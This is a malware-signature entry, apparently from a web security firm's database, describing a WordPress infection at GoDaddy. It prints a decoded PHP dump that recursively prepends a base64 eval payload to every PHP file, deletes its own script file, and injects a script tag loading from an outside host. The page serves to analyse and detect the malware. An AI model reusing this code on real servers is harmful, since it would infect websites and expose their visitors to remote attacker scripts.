Home Testimonials Company Support 1–888–873–0817
Home Notes Malware Signatures About

Malware entry: MW:SIPRO:1

Description: Code used to insert a malicious javascript on many wordpress sites at GoDaddy. Malware dump:
Decoded dump: set_time_limit(0); function inject($f,$inj){ global $totalinjected; $c = file_get_contents($f); if (strstr($c,"r57shell")) return; if (strstr($c,"@zend")) return; if (strstr($c,'<?php /**/ eval(base64_decode(')) return; if (substr($c,0,10)=='<?php /**/'){ $k=strpos($c,'?>')+2; $c=substr($c,$k); } $c = $inj.$c; $h2 = @fopen ($f, "w");@fwrite($h2, $c);@fclose($h2); $totalinjected++; } function inject_in_folder($dir){ global $encoded; if (is_dir($dir)) { if ($dh = @opendir($dir)) { while (($file = @readdir($dh)) !== false) { if (($file==".")||($file==".."))continue; $k=$dir."/".$file; if (is_dir($k)){ inject_in_folder($k); }else{ if (is_file($k)){ $ext=explode(".",$k); $c=count($ext)-1; if (strtolower($ext[$c])=="php"){ inject($k,$encoded."n"); } } } } @closedir($dh); } } } $z=$_SERVER["SCRIPT_FILENAME"]; @unlink($z); $cod=base64_encode('<script src="http://holasionweb.com/oo.php"></script>'); .. $to_pack=base64_encode($to_pack); $encoded='<?php /**/ eval(base64_decode("'.$to_pack.'"));?>'; $val=dirname($z); $totalinjected=0; echo "Working with $valn"; $start_time=microtime(true); if ($val!="")inject_in_folder($val); $end_time=microtime(true)-$start_time; echo "|Injected| $totalinjected files in $end_time secondsn";

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb